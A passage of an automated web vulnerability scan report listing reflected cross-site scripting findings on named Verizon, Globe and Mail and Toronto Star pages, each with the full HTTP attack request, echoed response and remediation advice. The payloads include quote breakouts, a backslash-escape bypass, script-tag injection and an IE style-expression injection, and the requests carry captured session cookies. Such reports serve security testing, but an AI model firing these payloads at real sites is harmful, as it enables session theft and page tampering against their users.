Set-Cookie: VZCSESSIONID=0h8GMntdpL8cWDx9D4hWqZ5N1YLxWM7dWJj4G1SnRG8pZrG7PSc9!-552517484; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='4e720";alert(1)//81de72d4a66&web_search_type=basic&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.769. http://wapp.verizon.net/handlers/bookmarks_ex/redirectex.ashx [web_search_type parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wapp.verizon.net
Path:   /handlers/bookmarks_ex/redirectex.ashx

Issue detail

The value of the web_search_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12a04"%3balert(1)//4994f840c79 was submitted in the web_search_type parameter. This input was echoed as 12a04";alert(1)//4994f840c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /handlers/bookmarks_ex/redirectex.ashx?bm=goo_search&q='&web_search_type=basic12a04"%3balert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr HTTP/1.1
Host: wapp.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/Login.jsp?src=SAM&err=1011
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Content-Length: 221
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="/w3c/p3p.xml", CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/html;charset=UTF-8
Expires: Sat, 20 Nov 2010 02:07:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 02:07:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: VZCSESSIONID=vnznMntdnppz3b1fGRLzPLpJCkPys1C1rnTyhKdsftXNHrRpy26h!-1123586183; path=/


<script>
   window.location = "http://www.verizon.net/central/vzc.portal?_nfpb=true&_pageLabel=google_results&q='&web_search_type=basic12a04";alert(1)//4994f840c79&clientid=cnsmr&channel=Nwcnsmr";
</script>

2.770. http://www.theglobeandmail.com//site-search/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   //site-search/

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9671f\"%3balert(1)//14dec817273 was submitted in the q parameter. This input was echoed as 9671f\\";alert(1)//14dec817273 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET //site-search/?q=9671f\"%3balert(1)//14dec817273 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.theglobeandmail.com
Cookie: s_pers=%20_ga_tsm%3Dm%253DDirect%252520%25252F%252520Brand%252520Aware%25253A%252520Typed%252520%25252F%252520Bookmarked%252520%25252F%252520etc%257Cs%253D%2528none%2529%7C1292810742558%3B%20s_user_zip%3DNot%2520Set%7C1447898750660%3B%20s_user_country%3DNot%2520Set%7C1447898750672%3B%20s_depth%3D2%7C1290220550740%3B%20s_c31%3Dnews%7C1290220550749%3B%20s_c32%3Dno%2520value%7C1290220550757%3B; __qca=P0-653106129-1290218667628; __utma=206016598.1311115112.1290218668.1290218668.1290218668.1; __utmz=206016598.1290218668.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); anonId=a8359dd6-06b2-4e88-b76f-f83ce67cc923; s_sess=%20s_user_login_status%3DNot%2520Logged%2520In%3B%20s_cc%3Dtrue%3B%20s_v13%3D%2527%2527%3B%20bc%3D0%3B%20sc_l%3D%3B%20s_sq%3D%3B%20s_ppv%3D51%3B; __utmc=206016598; SiteLifeHost=l3vm163l3pluckcom; BIGipServerEceweb=369286154.20736.0000; gam.adv.lastSection=googlesitesearch; JSESSIONID=abc1k1ajF8mly8ykwcNXs

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web2
Content-Length: 34656
Date: Sun, 21 Nov 2010 15:19:27 GMT
X-Varnish: 776318547
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!doctype html>
<html lang="en-ca" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:pas="http://sitelife.theglobeandmail.com/2009/pluckApplicationServer">
<head>
<link rel="stylesheet" type="text/cs
...[SNIP]...
b = "-pubRoot-googlesitesearch";
adv.loc = "sec";
adv.adpg = "googlesitesearch";
lastSectionCookie = "googlesitesearch";
$.cookie(advLastSectionCookie, lastSectionCookie,{path:'/'});
adv.search.skw = "9671f\\";alert(1)//14dec817273";
adv.search.cars.make = "";
adv.search.cars.model = "";
adv.search.cars.year = "";
adv.search.cars.segment = "";
adv.lastSection = lastSectionCookie;
</script>
...[SNIP]...

2.771. http://www.theglobeandmail.com//site-search/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   //site-search/

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload 4c4f1<script>alert(1)</script>12c1de1c3d was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET //site-search/?q=%27%27770a9<script>alert(1)</script>HOYT%20LLC%20PoC%20XSS%2011.19.10104c4f1<script>alert(1)</script>12c1de1c3d HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.theglobeandmail.com
Cookie: s_pers=%20_ga_tsm%3Dm%253DDirect%252520%25252F%252520Brand%252520Aware%25253A%252520Typed%252520%25252F%252520Bookmarked%252520%25252F%252520etc%257Cs%253D%2528none%2529%7C1292810742558%3B%20s_user_zip%3DNot%2520Set%7C1447898750660%3B%20s_user_country%3DNot%2520Set%7C1447898750672%3B%20s_depth%3D2%7C1290220550740%3B%20s_c31%3Dnews%7C1290220550749%3B%20s_c32%3Dno%2520value%7C1290220550757%3B; __qca=P0-653106129-1290218667628; __utma=206016598.1311115112.1290218668.1290218668.1290218668.1; __utmz=206016598.1290218668.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); anonId=a8359dd6-06b2-4e88-b76f-f83ce67cc923; s_sess=%20s_user_login_status%3DNot%2520Logged%2520In%3B%20s_cc%3Dtrue%3B%20s_v13%3D%2527%2527%3B%20bc%3D0%3B%20sc_l%3D%3B%20s_sq%3D%3B%20s_ppv%3D51%3B; __utmc=206016598; SiteLifeHost=l3vm163l3pluckcom; BIGipServerEceweb=369286154.20736.0000; gam.adv.lastSection=googlesitesearch; JSESSIONID=abc1k1ajF8mly8ykwcNXs

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: text/html; charset=UTF-8
P3P: policyref="http://www.theglobeandmail.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa CONi OUR NOR IND PHY ONL UNI COM NAV INT DEM STA PRE"
X-ServerName: Web2
Content-Length: 34894
Date: Sun, 21 Nov 2010 15:19:28 GMT
X-Varnish: 776318620
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!doctype html>
<html lang="en-ca" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:pas="http://sitelife.theglobeandmail.com/2009/pluckApplicationServer">
<head>
<link rel="stylesheet" type="text/cs
...[SNIP]...
</script>HOYT LLC PoC XSS 11.19.10104c4f1<script>alert(1)</script>12c1de1c3d";
adv.search.cars.make = "";
adv.search.cars.model = "";
adv.search.cars.year = "";
adv.search.cars.segment = "";
adv.lastSection = lastSectionCookie;
</script>
...[SNIP]...

2.772. http://www.thestar.com/ScriptResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /ScriptResource.axd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3314'%3ba10fa5fd7fb was submitted in the REST URL parameter 1. This input was echoed as f3314';a10fa5fd7fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /f3314'%3ba10fa5fd7fb?d=irnxx2KQBkfaN4-s-K6tRcT7IX4mUCX5Z3MTLJ9opFi-OG7kGcqqMbwrl66f7jMkdvpqoLadMBbEe6FzsPaFTLQ81f5pLfpgY6f2bg9w4qZAZi2CpYjlAhYixVlseZOktaFgznt1V-w-zZJfgCsubjk8ftc1&t=c425b46 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.thestar.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290230323693%3E0%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-3
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Date: Sun, 21 Nov 2010 15:18:28 GMT
X-Varnish: 2036297712
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 52738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_f3314';a10fa5fd7fb_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.773. http://www.thestar.com/WebResource.axd [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /WebResource.axd

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb1be'%3b50fa164876d was submitted in the REST URL parameter 1. This input was echoed as cb1be';50fa164876d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cb1be'%3b50fa164876d?d=pF4WHrC6CQAEdIripK6hpXrGKciG73Muk1soIJ0MQOWoRgh3Dsal5VO6jmBv9cEjUs00vJKT9euwDWEtK7Z0MXNi0eQ1&t=634210220612724343 HTTP/1.1
Accept: */*
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.thestar.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290230323693%3E0%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-2
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Date: Sun, 21 Nov 2010 15:18:20 GMT
X-Varnish: 2036296818
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 52526


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_cb1be';50fa164876d_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.774. http://www.thestar.com/includes/headerweather [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/headerweather

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28e17'%3b1d7d66ed8f9 was submitted in the REST URL parameter 1. This input was echoed as 28e17';1d7d66ed8f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes28e17'%3b1d7d66ed8f9/headerweather?CurrentEdition=toronto HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.thestar.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290352493298%3E0%3A1-1%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers; s_vnumb_s=2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 21 Nov 2010 15:19:52 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-1
cache-control: public, max-age = 120
X-TOPS-CacheReason: Weather
Date: Sun, 21 Nov 2010 15:19:54 GMT
X-Varnish: 2036311830
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 53084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includes28e17';1d7d66ed8f9_headerweather_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.775. http://www.thestar.com/includes/headerweather [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /includes/headerweather

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload beb4b'%3ba1434ca4324 was submitted in the REST URL parameter 2. This input was echoed as beb4b';a1434ca4324 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/headerweatherbeb4b'%3ba1434ca4324?CurrentEdition=toronto HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://www.thestar.com/searchresults?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.thestar.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290352493298%3E0%3A1-1%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers; s_vnumb_s=2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sun, 21 Nov 2010 15:20:38 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-3
cache-control: public, max-age = 120
X-TOPS-CacheReason: Weather
Date: Sun, 21 Nov 2010 15:20:41 GMT
X-Varnish: 2036318638
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 52940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_includes_headerweatherbeb4b';a1434ca4324_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.776. http://www.thestar.com/searchresults [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /searchresults

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b53c'%3bfc66f9b6ed9 was submitted in the REST URL parameter 1. This input was echoed as 5b53c';fc66f9b6ed9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults5b53c'%3bfc66f9b6ed9?AssetType=article&stype=genSearch&q=%3E%3E&r=all:1 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.thestar.com
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290230323693%3E0%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-3
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Date: Sun, 21 Nov 2010 15:26:01 GMT
X-Varnish: 2036367670
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 52912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_searchresults5b53c';fc66f9b6ed9_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

2.777. http://www.thestar.com/searchresults [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thestar.com
Path:   /searchresults

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36e6e"%3balert(1)//878252ac0f9 was submitted in the q parameter. This input was echoed as 36e6e";alert(1)//878252ac0f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /searchresults?AssetType=article&stype=genSearch&q=%3E%3E36e6e"%3balert(1)//878252ac0f9&r=all:1 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.thestar.com
Cookie: BIGipServerTOPS-WebFarm5=604050348.20480.0000; UserLastLogin=2010-11-20 00:17:12; cookieEVar1=standard; title=ALL DATES; s_cc=true; s_sq=%5B%5BB%5D%5D; __utmc=129518793; s_vnumb=1290230323693%3E0%3A1; s_vi=[CS]v1|2673AD10851D12D2-6000012C0002F184[CE]; __utma=129518793.178290496.1290230241.1290230241.1290230241.1; __utmz=129518793.1290230248.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=toronto%20top%20newspapers

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-3
X-TOPS-CacheReason: Speed
cache-control: public, max-age = 300
Date: Sun, 21 Nov 2010 15:22:36 GMT
X-Varnish: 2036335214
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish4
X-Cache: MISS
Content-Length: 60128


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
an identifying name, server, and channel on
the next lines. */
s.pageName="/Search/Searchresults/ArticleTab"
s.hier2="Search/Searchresults/ArticleTab"
s.prop1 = ">>36e6e";alert(1)//878252ac0f9"
s.prop23 = ""
//-->
...[SNIP]...

2.778. http://www.thestar.com/searchresults [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thestar.com
Path:   /searchresults

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cab3"style%3d"x%3aexpression(alert(1))"28a7f4da4bb was submitted in the q parameter. This input was echoed as 6cab3"style="x:expression(alert(1))"28a7f4da4bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /searchresults?AssetType=article&stype=genSearch&q=%3E%3E6cab3"style%3d"x%3aexpression(alert(1))"28a7f4da4bb&r=all:1 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.thestar.com
